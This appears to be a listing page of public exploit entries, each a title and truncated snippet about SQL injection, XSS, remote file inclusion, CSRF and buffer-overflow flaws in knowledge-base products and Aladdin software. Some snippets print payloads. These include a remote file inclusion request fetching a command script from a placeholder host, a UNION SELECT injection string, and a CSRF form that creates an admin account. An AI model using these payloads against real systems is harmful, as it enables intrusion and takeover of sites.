WSN Knowledge Base 1.2 index.php Multiple Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...

WSN Knowledge Base 1.2 memberlist.php id Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...

Aladdin Knowledge Systems eSafe Gateway 3.0 HTML tag Script-filtering Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2800/info eSafe Gateway is a security utility used for filtering internet content. It is possible to craft an html file that slips through eSafe Gateway's script filtering feature. eSafe Gateway will ignore scripting...

Aladdin Knowledge Systems eSafe Gateway 3.0 Unicode Script-filtering Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2801/info eSafe Gateway is a security utility used for filtering internet content. An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply encoding the SCRIPT ta...

Interspire Knowledge Manager 5 'callback.snipshot.php' Arbitrary File Creation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/38186/info Interspire Knowledge Manager is prone to a vulnerability that allows attackers to create arbitrary files on a vulnerable computer. An attacker may exploit this issue to create arbitrary files, which may then be...

Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability

No description provided by source. Title: Knowledge Base Mod for PHPbb = 2.0.2 remote file inclusion URL: http://www.phpbb2.de/dload.php?action=file&fileid=538 Dork: Powered by Knowledge Base Credits: Oo Exploit: /includes/kbconstants.php?modulerootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...

Knowledge Base Enterprise Edition 4.62.00 SQL Injection Vulnerability

No description provided by source...

Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...

Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/29626/info Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script cod...

AJ Article Persistent XSS Vulnerability

No description provided by source. 1 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 vendor URL :http://www.ajsquare.com/ Google Dork :Powered By: AJ Square Inc Author : Sid3^effects aKa HaRi special thanks to : r0073r...

Multiple WebmasterSite Products Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/30572/info Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data. Successfully exploiting this issue will all...

68kb Knowledge Base 1.0.0rc3 - Admin CSRF

No description provided by source. Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF Date: 2010-04-02 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip Version: v1.0.0rc3 html body onload=document.formsedit.submit form name=creat...

Interspire Knowledge Manager 5 'p' Parameter Directory Traversal Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/36541/info Interspire Knowledge Manager is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive...

WSN Knowledge Base 1.2 comments.php id Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...

Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF

No description provided by source. !--------------------------------------------------------------------------- | Exploit: Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF | | Author: b33f - http://www.fuzzysecurity.com/ | | OS: Tested on XP PRO SP3 | | Browser: IE 4.01, IE 5.01, I...

PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection Vulnerabilities

No description provided by source...

68kb Knowledge Base Script 1.0.0rc2 Search - SQL Injection

No description provided by source. Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %'//UNION//ALL//SELECT//1,2,user,4,5,6,7,8,9,10,11,12,13,14,15 Don't use spaces in...

68KB 1.0.0rc4 - Remote File Include Vulnerability

No description provided by source. ==================================================== 68KB v1.0.0rc4 Remote File Include Vulnerability ==================================================== Vendor: http://68kb.com download: http://github.com/68designs/68KB/downloads Author: eidelweiss Contact:...

Iatek Knowledge Base 'content_by_cat.asp' - SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28376/info Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...

Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow

No description provided by source. html titleAladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow/title !-- Aladdin Knowledge Systems Lt.d PrivAgent ActiveX Control Overflow Vendor: Aladdin Knowledge Systems Version: activex2002 Tested on: Windows 2003 SP2 / IE 7 Download:...